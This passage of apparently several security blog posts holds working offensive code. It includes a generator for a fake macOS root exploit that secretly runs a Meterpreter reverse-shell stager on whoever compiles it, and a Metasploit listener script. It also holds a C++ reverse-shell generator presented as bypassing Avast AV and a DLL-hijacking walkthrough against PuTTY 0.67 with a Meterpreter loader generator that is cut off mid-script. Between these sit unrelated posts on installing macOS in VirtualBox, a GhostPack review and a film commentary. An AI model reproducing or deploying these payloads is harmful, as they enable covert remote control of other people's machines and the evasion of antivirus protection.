    int end = strlen(str) - 1;
    int i;
    for (i = 5; i < end; i++) {
        str[i] ^= 1;
    }
    return str;
}
int main(int argc, char **argv)
{
    system("clear");
    printf("====================================\n");
    printf("Local root exploit for MacOS 10.13.5\n");
    printf("====================================\n");
    printf("[*] Checking IOConsoleUsers\n");
    /* Fake progress: a growing row of dots with a pause between them */
    int i;
    for (i = 1; i <= 4; i++) {
        sleep(1);
        printf("%.*s", i, "....");
        fflush(stdout);
    }
    printf("\n[*] Found IOConsoleUsers address gap!\n");
    printf("\n[*] Spawning root shell\n");
    /* fork(): the parent prints a plausible failure and exits, so the victim sees an
       "exploit" that did not work, while the child keeps running the Meterpreter stager */
    pid_t process_id = fork();
    if (process_id < 0) {
        printf("fork failed!\n");
        exit(1);
    }
    if (process_id > 0) {
        printf("[-] Exploit failed due to invalid PID %d IOConsoleUsers \n", process_id);
        exit(0);
    }
    /* Child: copy the msfvenom buffer into an RWX anonymous mapping and jump to it */
    void *ptr = mmap(0, 0x2000, PROT_WRITE | PROT_READ | PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
        exit(1);
    }
    memcpy(ptr, buf, sizeof buf);
    void (*fp)() = (void (*)())ptr;
    fp();
    printf("\n[-] Exploit failed \n");
    return 0;
}
void genlol()
{
    int num1, num2, num3;
    num1 = 100;
    while (num1 <= 5) {
        num1 = random_in_range(0, 10000);
        num2 = random_in_range(0, 10000);
        num3 = random_in_range(0, 10000);
        printf("\n[*] /bin/bash exec 0 \n");
        printf("\n[*] R00t3d by 1337 h4x0rz \n");
    }
}
EOF
} > osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payload.c generated ...'
ls -la osx64-payload.c
else
echo '[-] Something went wrong .. '
exit 0
fi

This generates osx64-payload.c with the callback Meterpreter IP and port we chose. Now we can present the code as a super 1337 macOS local root exploit to the script-kiddie audience (anyone who writes C code will see through it straight away ;) )

Once the script kiddie compiles the code on their latest macOS 10.13.5 it will run and "fail"... but we get a reverse shell on our listener machine :)

Our listener script (place it in the metasploit-framework path and make it executable):

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic Listener generator - FOR METASPLOIT "
echo " For the OSX 64bit Meterpreter reverse_tcp payload "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read -r host
echo -e "What Port Number are we gonna listen to? : \c"
read -r port
echo "Starting the meterpreter listener.."
# Write a one-line wrapper so the same handler can be restarted later without retyping
echo "./msfconsole -x \"use exploit/multi/handler; set PAYLOAD osx/x64/meterpreter/reverse_tcp; set LHOST $host; set LPORT $port; run\"" > run.listener.sh
chmod +x run.listener.sh
./run.listener.sh

Evil, no?

Here is the video of the above

Installing High Sierra 10.13.6 in VirtualBox 5.2.12 on Linux x86_64


Since the MacOS system updates (minor version upgrades) do not work in VirtualBox (maybe somebody got it going, it does not work for me), I have decided to get my own Mac Mini and produce a usable MacOS ISO for installation in VirtualBox whenever a new version comes out.

I have followed this blog post to create the ISO for High Sierra 10.13.6 https://tylermade.net/2017/10/05/how-to-create-a-bootable-iso-image-of-macos-10-13-high-sierra-installer/

So there are no hacks involved in the ISO, all is valid stuff from Apple.

So on the freshly updated MacOS I have executed the following

hdiutil create -o /tmp/HighSierra.cdr -size 5200m -layout SPUD -fs HFS+J
hdiutil attach /tmp/HighSierra.cdr.dmg -noverify -mountpoint /Volumes/install_build
sudo /Applications/Install\ macOS\ High\ Sierra.app/Contents/Resources/createinstallmedia --volume /Volumes/install_build 
mv /tmp/HighSierra.cdr.dmg ~/Desktop/InstallSystem.dmg 
hdiutil detach /Volumes/Install\ macOS\ High\ Sierra 
hdiutil convert ~/Desktop/InstallSystem.dmg -format UDTO -o ~/Desktop/HighSierra.iso

And uploaded HighSierra.iso to my Linux system (Intel x86_64). Please be aware that this won’t work on AMD CPUs since Apple does not support them.

You can get the latest 10.13.6 ISO here -> https://drop.me/ByWxnP

Next I have installed the High Sierra 10.13.6 exactly the same way as the previous version 10.13.5 https://astr0baby.wordpress.com/2018/06/11/installing-high-sierra-10-13-5-in-virtualbox-5-2-12-on-linux-x86_64/

GhostPack quick review


Today @harmj0y from SpecterOps released to the public his and the other team members' tools, called GhostPack  http://github.com/GhostPack/

I have been following their work for a while and in my opinion they are among the best in terms of offensive/defensive work on the PowerShell side of Windows cyber-security.

Their latest toolkit GhostPack is most of their work rewritten from PowerShell scripts into C#, and you can read all about it in their official release statement https://posts.specterops.io/ghostpack-d835018c5fc4

What I have tested:

Compilation worked fine on Windows 7 SP1 x86_64 via Visual Studio 2013 for the following

  SharpDump
  SharpRoast
  SharpUp
  SharpWMI

Only the following needed Visual Studio 2015 (which I ran on Windows 10 x86_64)

  Seatbelt

The compilation is straightforward, as taken from their GitHub instructions

Seatbelt has been built against .NET 3.5 
and is compatible with Visual Studio 2015 Community Edition. 
Simply open up the project .sln, choose "release", and build.

Next I have loaded Windows 10 x86_64 with fully updated Defender and the latest patches for the build of Windows 10 17134.165

I have prepared a custom Meterpreter loader and a listener and tried to execute all the compiled GhostPack binaries from the meterpreter shell directly in memory via the following

meterpreter > execute -H -i -c -f /home/user/metasploit-framework/Seatbelt.exe -m -d calc.exe

However this did not work for any of the executables (apart from SafetyKatz.exe, which I did not even try to load this way, since it dumps files to c:/tmp to work with the minidump). Instead I have just uploaded them and executed them via a shell command from meterpreter.

Finally I have prepared a video demonstration of the tests here


Some interesting moments from the “Who am I – Kein System ist sicher ” movie


Another one from the collection of WTF moments … maybe this one is slightly better than the others. A great German movie from 2014 https://www.imdb.com/title/tt3042408/ that I have just watched recently.

From this movie one can remember this word – NIEMAND

Niemand is synonymous with keiner (no one), which is the nominalised masculine form of the pronoun kein (no). In written German, niemand is more common than keiner, whereas colloquial German often prefers the latter. (Note that keiner can also be used in other senses, in which niemand is not applicable.)

This movie is also laced by Ritalin, as one can glimpse throughout the movie … something the low-class hippies of the 70’s enjoyed a lot (read – poor man’s speed)

I have made some screenshots from the film that I wanted to comment on (from the technical aspect). So let's start

First glimpse of the console and Nmap pops in .. I guess this is a classic now and a great introduction to all the wonderful NSE scripts (its already mentioned in the hall of fame https://nmap.org/movies/)

Next comes some wild exploit attempt to shut down the German power provider to show a point

In next hax0r scene we see is Benjamin sabotaging the local Nazi convention’s main speakers laptop and hooking it up to a rogue AP … some wild console-fu there …

Next we jump into some 1337 bufferoverlow.sh shell pr0n on top of the Berlin rooftops

while injecting a custom mp4 to the major German morning business news channel

And leaving a rather rude message to all the poor Business people out there …

Next there is an attack on some big German Pharma .. it involves hacking the main HQ building lights and displaying a message, like we simulate with BlinkenLights .. hey, this was done in Berlin already, right? By the CCC, no? :)

We are 1337 …

And while we are at it we can win ourselves a nice German Porsche in a phone contest….

But when we party with the girlz … well things don’t turn out so well …

MRX, master hax0r from the Darknet, does not care what we did…. so we do something to impress him … we hack the BND …um … by phishing its employees …

With nice LOL Catz  “Can I haz some Cheesburger plz ? ”

So we hack the shit out of the BND once in …

And target the main BND print server and alter the print jobs there ….

Who the hell is this MRX anyway  … so we go on IRC again … lets find out

He lets us talk to him ! All hail the master .

But lets destroy all the HDD with some Acid now … remember Viktor from Brutal Nikita ?

So we prepare a 1337 double trojan and feed it to MRX on IRC

He does not bite … Bitchez ! Looks at me ! Well we end our command line pr0n here … it was actually a nice movie and I have enjoyed it a lot …

Is this where the authors of Mr. Robot got the original idea from ? heh ?

Installing Mojave 10.14 Beta in VirtualBox 5.2.16 on Linux x86_64


Updated 04.08.2018 – Fixed the missing xz command in the script

Apple has released a public beta for their latest OS, codename Mojave – macOS 10.14. If you possess a relatively new Mac then you can easily download, install and use it. There are a couple of changes that I have noticed (and learned the hard way) in Mojave, namely the APFS enforcement on the drive you install Mojave to. Even if you initially format the drive with Mac OS Extended, in the second stage of the install the disk gets magically converted to APFS.

This is where I got stuck for a while, since the VirtualBox EFI shell did not know how to even see the APFS formatted drive in order to boot from it. I came across an excellent project from Alexander Willner – Run macOS 10.14 Mojave on VirtualBox on macOS ( https://github.com/AlexanderWillner/runMacOSinVirtualBox ) and even though this is strictly Mac only, it provided me enough clues to replicate his approach and successfully install Mojave on VirtualBox running on Linux.

So here are my steps that I have done

  1. Creating and obtaining the Mojave ISO yourself if you do not trust the copies on the Internet (I did not upload mine since it is about 10 Gigabytes)

If you already have macOS High Sierra installed in your VirtualBox then you can dive in. !!!!!! MAKE SURE YOU HAVE ENOUGH DISK SPACE ON YOUR MAC !!!!! About 50 Gigabytes should be fine. Otherwise please follow my previous articles ( https://astr0baby.wordpress.com/2018/07/15/installing-high-sierra-10-13-6-in-virtualbox-5-2-12-on-linux-x86_64/ )

Once inside the macOS, make sure you have your AppleID ready, if not create one (takes about 10 minutes). Next open Safari and point it to

https://beta.apple.com/sp/betaprogram/redemption#macos

Login with your AppleID and install the macOS Public Beta Access Utility

Once its installed, you can move next to download the Mojave image

The download can take some time, be patient and remember once its finished DO NOT INSTALL IT !  Just exit the Mojave installer.

Next I have carved out some portions from Alexander’s excellent script here https://github.com/AlexanderWillner/runMacOSinVirtualBox/blob/master/runMojaveVirtualbox.sh

First one is to prepare the Mojave ISO – called image.sh

#!/bin/sh
readonly INST_VERS="$(find /Applications -maxdepth 1 -type d -name 'Install macOS*' | wc -l | tr -d '[:space:]')"
readonly INST_VER="$(find /Applications -maxdepth 1 -type d -name 'Install macOS*' -print -quit)"
readonly INST_BIN="$INST_VER/Contents/Resources/createinstallmedia"
readonly DST_DIR="/tmp"
readonly VM="macOS-Mojave"
readonly VM_DIR="$HOME/VirtualBox VMs/$VM"
readonly DST_DMG="$DST_DIR/$VM.dmg"
readonly DST_CLOVER="$DST_DIR/${VM}Clover"
readonly DST_VOL="/Volumes/$VM"
readonly DST_ISO="$DST_DIR/$VM.iso.cdr"

ejectAll() {
hdiutil info | grep 'Install macOS' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil info | grep 'OS X Base System' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil info | grep 'InstallESD' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil detach "$DST_VOL" 2>/dev/null || true
}

version="$(/usr/libexec/PlistBuddy -c 'Print CFBundleShortVersionString' "$INST_VER/Contents/Info.plist")"
echo "Creating image '$DST_DMG' (be patient, version $version, will need sudo)..." 
ejectAll
hdiutil create -o "$DST_DMG" -size 10g -layout SPUD -fs HFS+J &&
hdiutil attach "$DST_DMG" -mountpoint "$DST_VOL" &&
sudo "$INST_BIN" --nointeraction --volume "$DST_VOL"
ejectAll
hdiutil convert "$DST_DMG" -format UDTO -o "$DST_ISO"

After this script finishes (takes some time) you should have the ISO file ready in /tmp on your virtualized macOS. We can delete the macOS-Mojave.dmg now but keep the macOS-Mojave.iso.cdr

Move the file somewhere since we will be transferring  it to our Linux host.

Please note we are using xz in the next script to uncompress the Clover image tarball! To get xz on macOS, first install brew like so

/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

brew install xz 

Next we run a second script that will prepare the Clover boot ISO and inject apfs.efi driver. Script is called clover.sh

#!/bin/bash
readonly INST_VER="$(find /Applications -maxdepth 1 -type d -name 'Install macOS*' -print -quit)"
# Same volume name image.sh used; ejectAll() below refers to it
readonly DST_VOL="/Volumes/macOS-Mojave"
# config.plist must be saved to disk (-o): it is copied into the Clover image further down
curl -Lk https://raw.githubusercontent.com/AlexanderWillner/runMacOSinVirtualBox/master/config.plist -o config.plist
ejectAll() {
hdiutil info | grep 'Install macOS' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil info | grep 'OS X Base System' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil info | grep 'InstallESD' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil detach "$DST_VOL" 2>/dev/null || true
}

ejectAll
hdiutil attach "$INST_VER/Contents/SharedSupport/BaseSystem.dmg" &&
cp /Volumes/OS\ X\ Base\ System/usr/standalone/i386/apfs.efi "./apfs.efi"
ejectAll

curl -Lk https://sourceforge.net/projects/cloverefiboot/files/Bootable_ISO/CloverISO-4533.tar.lzma/download -o clover.tar.lzma
sleep 1
xz -d clover.tar.lzma
tar xf clover.tar
hdiutil detach /Volumes/Clover-v2.4k-4533-X64/ 2>/dev/null || true
hdiutil attach Clover-v2.4k-4533-X64.iso
hdiutil create -megabytes 16 -fs MS-DOS -volname MojaveClover -o ./clover.dmg
hdiutil detach /Volumes/NO\ NAME/ 2>/dev/null || true
hdiutil attach ./clover.dmg
cp -r /Volumes/Clover-v2.4k-4533-X64/* /Volumes/NO\ NAME/
cp ./config.plist /Volumes/NO\ NAME/EFI/CLOVER/
cp ./apfs.efi /Volumes/NO\ NAME/EFI/CLOVER/drivers64UEFI/
hdiutil detach /Volumes/Clover-v2.4k-4533-X64/
hdiutil detach /Volumes/NO\ NAME/
hdiutil makehybrid -iso -joliet -o ./clover.iso ./clover.dmg

So now we should have clover.iso in our working directory, and this should be moved to the same location where we put the previous macOS-Mojave.iso.cdr. For your convenience I have uploaded the clover.iso for Mojave here https://drop.me/MRqW76

So next we transfer the files to our Linux host (scp, Samba, whichever way you prefer; I personally set up a Samba server on my Linux box and upload via SMB from the VMs)

2. Setting up VirtualBox for Mojave

Next we will start preparing our VirtualBox environment. I have configured mine like so:

For networking I use the following setup

And this network script that I run on my Linux host (This is my config, your environment will be probably different, but feel free to experiment)

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25 vboxnet0 
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

After you create the environment, and before you boot the Mojave installer, run the following script – assuming you named your VM “Mojave”; otherwise change the variable $NAME accordingly

#!/bin/bash
readonly VM_RES="1680x1050"
readonly NAME="Mojave"

VBoxManage modifyvm "$NAME" --usbxhci on --firmware efi --chipset ich9 --mouse usbtablet --keyboard usb
VBoxManage setextradata "$NAME" "CustomVideoMode1" "${VM_RES}x32"
VBoxManage setextradata "$NAME" VBoxInternal2/EfiGraphicsResolution "$VM_RES"
VBoxManage modifyvm "$NAME" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1

Next we boot the Mojave installer (we have copied the Mojave and Clover ISOs over, right?)

Once you get to the Disk Utility, erase the new VirtualBox drive with APFS and let it install. After a few minutes it will reboot, now shut down the VM and remove the macOS-Mojave.iso.cdr from the CD drive and replace it  with clover.iso

Once we boot clover.iso the mouse does not work; no worries, the keyboard still does, so use the arrow keys to move to the following

The installation will follow, this time it will take much longer, about 20 – 30 minutes on SSD drive for me.

When the installer exits and goes for a reboot the system gets stuck; just power off the VM and boot as follows (still keeping the clover.iso attached)

Now you should be all set to configure your new Mojave in VirtualBox on Linux !

Again, big thanks to Alexander Willner for his concept! https://github.com/AlexanderWillner

Bypassing latest Avast AV on Windows 10 x86_64


Short post here,

Having read a really nice article about avoiding modern AVs (again and again) by @ParanoidNinja here https://scriptdotsh.com/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/  I have decided to add my 0.1 % of code to his to make it a little easier to use on x86_64 Linux (Mint 19)

You will need to have the mingw64 environment installed properly; I have the following packages installed

ii binutils-mingw-w64-i686 2.30-7ubuntu1+8ubuntu1 amd64 Cross-binutils for Win32 (x86) using MinGW-w64
ii binutils-mingw-w64-x86-64 2.30-7ubuntu1+8ubuntu1 amd64 Cross-binutils for Win64 (x64) using MinGW-w64
ii g++-mingw-w64 7.3.0-11ubuntu1+20.2build1 all GNU C++ compiler for MinGW-w64
ii g++-mingw-w64-i686 7.3.0-11ubuntu1+20.2build1 amd64 GNU C++ compiler for MinGW-w64 targeting Win32
ii g++-mingw-w64-x86-64 7.3.0-11ubuntu1+20.2build1 amd64 GNU C++ compiler for MinGW-w64 targeting Win64
ii gcc-mingw-w64 7.3.0-11ubuntu1+20.2build1 all GNU C compiler for MinGW-w64
ii gcc-mingw-w64-base 7.3.0-11ubuntu1+20.2build1 amd64 GNU Compiler Collection for MinGW-w64 (base package)
ii gcc-mingw-w64-i686 7.3.0-11ubuntu1+20.2build1 amd64 GNU C compiler for MinGW-w64 targeting Win32
ii gcc-mingw-w64-x86-64 7.3.0-11ubuntu1+20.2build1 amd64 GNU C compiler for MinGW-w64 targeting Win64
ii mingw-w64 5.0.3-1 all Development environment targeting 32- and 64-bit Windows
ii mingw-w64-common 5.0.3-1 all Common files for Mingw-w64
ii mingw-w64-i686-dev 5.0.3-1 all Development files for MinGW-w64 targeting Win32
ii mingw-w64-tools 5.0.3-1 amd64 Development tools for 32- and 64-bit Windows
ii mingw-w64-x86-64-dev 5.0.3-1 all Development files for MinGW-w64 targeting Win64

Next we are gonna use the following binary code generator script that will produce our Win32PE executable payload that shall be used on Windows 10 protected by Avast AV

#!/bin/bash
clear
echo "**************************************************************************************"
echo " Automatic C++ source code generator/compiler "
echo " 99.9% code by Paranoid Ninja "
echo " 0.1% code by Astr0 Baby " 
echo " PE32+ executable (GUI) x86-64 "
echo "**************************************************************************************"

echo -en 'Listener server IP : ' 
read ip
echo -en 'Listener port number : ' 
read port

cat <<EOF > final.cpp
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024


void RunShell(char* C2Server, int C2Port) {
while(true) {
Sleep(5000); // 1000 = One Second

SOCKET mySocket;
sockaddr_in addr;
WSADATA version;
WSAStartup(MAKEWORD(2,2), &version);
mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
addr.sin_family = AF_INET;

addr.sin_addr.s_addr = inet_addr(C2Server); //IP received from main function
addr.sin_port = htons(C2Port); //Port received from main function

//Connecting to Proxy/ProxyIP/C2Host
if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) {
closesocket(mySocket);
WSACleanup();
continue;
}
else {
char RecvData[DEFAULT_BUFLEN];
memset(RecvData, 0, sizeof(RecvData));
int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
if (RecvCode <= 0) {
closesocket(mySocket);
WSACleanup();
continue;
}
else {
char Process[] = "powershell.exe";
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
memset(&sinfo, 0, sizeof(sinfo));
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket;
CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
WaitForSingleObject(pinfo.hProcess, INFINITE);
CloseHandle(pinfo.hProcess);
CloseHandle(pinfo.hThread);

memset(RecvData, 0, sizeof(RecvData));
int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
if (RecvCode <= 0) {
closesocket(mySocket);
WSACleanup();
continue;
}
if (strcmp(RecvData, "exit\n") == 0) {
exit(0);
}
}
}
}
}

int main(int argc, char **argv) {
FreeConsole();
if (argc == 3) {
int port = atoi(argv[2]); //Converting port in Char datatype to Integer format
RunShell(argv[1], port);
}
else {
char host[] = "IPGOESHERE";
int port = PORTGOESHERE;
RunShell(host, port);
}
return 0;
}
EOF
sed -i -e "s/IPGOESHERE/$ip/g" final.cpp 
sed -i -e "s/PORTGOESHERE/$port/g" final.cpp

echo "[-] Compiling code .."
x86_64-w64-mingw32-g++ final.cpp -o file.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

if [ $? -eq 0 ]; then
echo "[*] Done ! " 
ls -la file.exe 
else
echo "[-] Failed, please check if you have proper mingw32-g++ installed " 
fi
echo "[-] Now start a local nc listener like this nc -lnvp $port"

You can run the whole execution here

Thanks @NinjaParanoid!

Understanding how DLL Hijacking works


It is vital to understand how these vulnerabilities (DLL hijacking from valid Windows PE32 executables) in fact work. So we will prepare a real-world scenario: we will use an outdated piece of software for this demonstration and run it on a fully patched Windows 10 x86_64 with an up-to-date Windows Defender.

  • Windows 10 x86_64 –  August 30, 2018—KB4346783 (OS Build 17134.254)
  • Windows Defender – Definitions 1.275.948.0 (September 8 2018)
  • Putty 32 bit 0.67 – Vulnerable to CVE-2016-6167 ( Downloadable here https://www.chiark.greenend.org.uk/~sgtatham/putty/releases/0.67.html)
  • Metasploit Framework (metasploit v5.0.0-dev-741bbefae8) running on Linux Mint 19
  • Linux x86_64 (I run Mint 19)
  • dos2unix converter
  • Mingw32 properly installed on Linux x86_64

Also for the analysis of the DLL vulnerabilities we will need the following tools to be executed on Windows 10

So once we have all this lets download Putty 0.67 32bit, procmon.exe and dllexp to the Windows 10 environment (I run it inside a VirtualBox guest)

Let's first prepare some filter rules for procmon.exe, as the output gets a little heavy and we are only interested in the putty.exe process anyway. So here is the vulnerable output from procmon

What we get is a list of DLLs that are obviously being looked for in the wrong place, in this case the user’s desktop (which is in fact the DLL hijacking scenario). So imagine we could place a specially crafted DLL in this place and re-run the vulnerable putty.exe. It would load the DLL, right? Well, it's not that easy, because the DLL needs to have a valid entry point (function) that is called prior to execution. So when putty.exe looks for one of the shared libraries it needs, it will call a function from within it and use it. So for our exploit to work we will need to know the name of the entry point as well.
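As an added example (mine, not from the post), here is a Python triage of a Process Monitor CSV export that separates the two things worth flagging in this output: failed DLL probes in a directory outside the Windows system directories, which is the exposure the filtered procmon output above shows, and an actual image load of such a DLL from that directory, which is what a hijacked putty.exe looks like in the same log. The CSV lines are constructed to mirror the post's scenario (32-bit putty.exe, so the real copies resolve from SysWOW64).

```python
import csv
import io
import ntpath

# Constructed Process Monitor CSV export (a real export has more columns), in
# the shape of the filtered output described above: putty.exe probes its own
# directory (the user's desktop) for DLLs before finding them in SysWOW64, and
# a later run (PID 4988) loads one of them from the desktop.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"9:12:01.0000001 PM","putty.exe","4120","CreateFile","C:\Users\user\Desktop\TextInputFramework.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:12:01.0000002 PM","putty.exe","4120","CreateFile","C:\Windows\SysWOW64\TextInputFramework.dll","SUCCESS","Desired Access: Read Attributes"
"9:12:01.0000003 PM","putty.exe","4120","Load Image","C:\Windows\SysWOW64\TextInputFramework.dll","SUCCESS","Image Base: 0x6f000000"
"9:12:01.0000004 PM","putty.exe","4120","CreateFile","C:\Users\user\Desktop\dwmapi.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:12:01.0000005 PM","putty.exe","4120","CreateFile","C:\Users\user\Desktop\putty.hlp","NAME NOT FOUND","Desired Access: Read Attributes"
"9:12:01.0000006 PM","explorer.exe","1380","CreateFile","C:\Users\user\Desktop\notes.txt","SUCCESS","Desired Access: Generic Read"
"9:15:40.0000001 PM","putty.exe","4988","Load Image","C:\Users\user\Desktop\TextInputFramework.dll","SUCCESS","Image Base: 0x10000000"
'''

# Directories the loader is expected to resolve system DLLs from.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")


def in_system_dir(path):
    """True when the file sits in (or under) one of the Windows system directories."""
    d = ntpath.dirname(path).lower().rstrip("\\")
    return any(d == s or d.startswith(s + "\\") for s in SYSTEM_DIRS)


def parse_procmon_csv(text):
    """Rows of a Process Monitor CSV export as dicts keyed by column name."""
    return list(csv.DictReader(io.StringIO(text)))


def triage(rows, process_name):
    """Split one process's DLL activity outside the system directories into
    (exposures, loads): failed probes there, and images actually loaded from there."""
    exposures, loads = [], []
    for row in rows:
        if row["Process Name"].lower() != process_name.lower():
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll") or in_system_dir(path):
            continue
        if row["Operation"] == "CreateFile" and row["Result"] == "NAME NOT FOUND":
            exposures.append(path)              # a name the loader would accept from here
        elif row["Operation"] == "Load Image" and row["Result"] == "SUCCESS":
            loads.append((row["PID"], path))    # a DLL that really came from here
    return exposures, loads


if __name__ == "__main__":
    exposures, loads = triage(parse_procmon_csv(SAMPLE_CSV), "putty.exe")
    print("probed but missing outside system dirs:", *exposures, sep="\n  ")
    print("loaded from outside system dirs:", *loads, sep="\n  ")
```

The first list is what to review before shipping or deploying a binary; the second is what a detection over image-load telemetry should alert on.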

Let's find out all the entry points from the valid DLLs listed above. We will use the NirSoft tool called dllexp. We will use TextInputFramework.dll as an example. Let's load it in dllexp as follows:

And once opened, copy-paste the entry point list to a text file that we save under the same DLL name for convenience (with a .txt extension), which will later be fed to a custom Metasploit script

So now we have a list of all entry points, but which one is the right one to spoof with the DLL exploit? We need to transfer this text file back to our attacker machine, from which we will prepare and compile our DLL to be used in the attack. First of all, convert the DOS line endings to UNIX format via the dos2unix command and place the text file with the entry points in the location from which you will be executing the next script

I have written the following script that helps in this case. What it does is produce a Meterpreter reverse loader function for each of the above entry points, which kind of brute-forces the vulnerable DLL function that putty.exe calls. Below is the code that I have placed inside my Metasploit root directory (it does not have to be there, of course)

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " Dll-EntryPoint Generator astr0 " 
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number (Choose something over TCP 1000) : '
read port
echo -en "File with dll-entries from dllexp binary (make sure you did fromdos on it) /path/to/file :"
read file
echo -en "DLL filename : " 
rm -f final-temp.c temp.c custom-temp.c 
read dllfilename

rm -f custom-temp.c
rm -f temp.c

# Add any DLL overrides here (functions that do not compile)
# Temporary fix for the TextInputFramework.dll errors 
sed -i '/DllCanUnloadNow/d' $file 
sed -i '/DllGetClassObject/d' $file

echo '#include <stdio.h>'> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo -n 'unsigned char server[]="' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned char serverp[]="' >> temp.c
echo -n $port >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo ' WSADATA wsaData;' >> temp.c
echo ' WORD wVersionRequested;' >> temp.c
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo ' printf("bad\n"); '>> temp.c
echo ' WSACleanup(); '>> temp.c
echo ' exit(1);'>> temp.c
echo ' }' >> temp.c
echo ' }' >> temp.c
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c
echo ' printf("r %s\n", error);'>> temp.c
echo ' closesocket(my_socket);'>> temp.c
echo ' WSACleanup();'>> temp.c
echo ' exit(1);' >> temp.c
echo ' }' >> temp.c
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo ' int tret = 0;'>> temp.c
echo ' int nret = 0;'>>temp.c
echo ' void * startb = buffer;'>> temp.c
echo ' while (tret < len) {'>>temp.c
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c
echo ' startb += nret;'>> temp.c
echo ' tret += nret;'>>temp.c
echo ' if (nret == SOCKET_ERROR)'>> temp.c
echo ' punt(my_socket, "no data");'>> temp.c
echo ' }'>>temp.c
echo ' return tret;'>> temp.c
echo '}' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c
echo ' struct hostent * target;' >> temp.c
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c
echo ' punt(my_socket, ".");'>>temp.c
echo ' target = gethostbyname(targetip);'>>temp.c
echo ' if (target == NULL)'>>temp.c
echo ' punt(my_socket, "..");'>>temp.c
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c
echo ' sock.sin_family = AF_INET;'>> temp.c
echo ' sock.sin_port = htons(port);'>>temp.c
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c
echo ' punt(my_socket, "...");'>>temp.c
echo ' return my_socket;'>>temp.c
echo ' }'>> temp.c

for i in `cat $file` ; do 
echo -n 'int ' >> custom-temp.c 
echo -n $i >> custom-temp.c
echo '(int argc, char * argv[]) {' >> custom-temp.c
echo ' FreeConsole();'>> custom-temp.c
echo ' ULONG32 size;'>> custom-temp.c
echo ' char * buffer;'>> custom-temp.c
echo ' void (*function)();'>> custom-temp.c
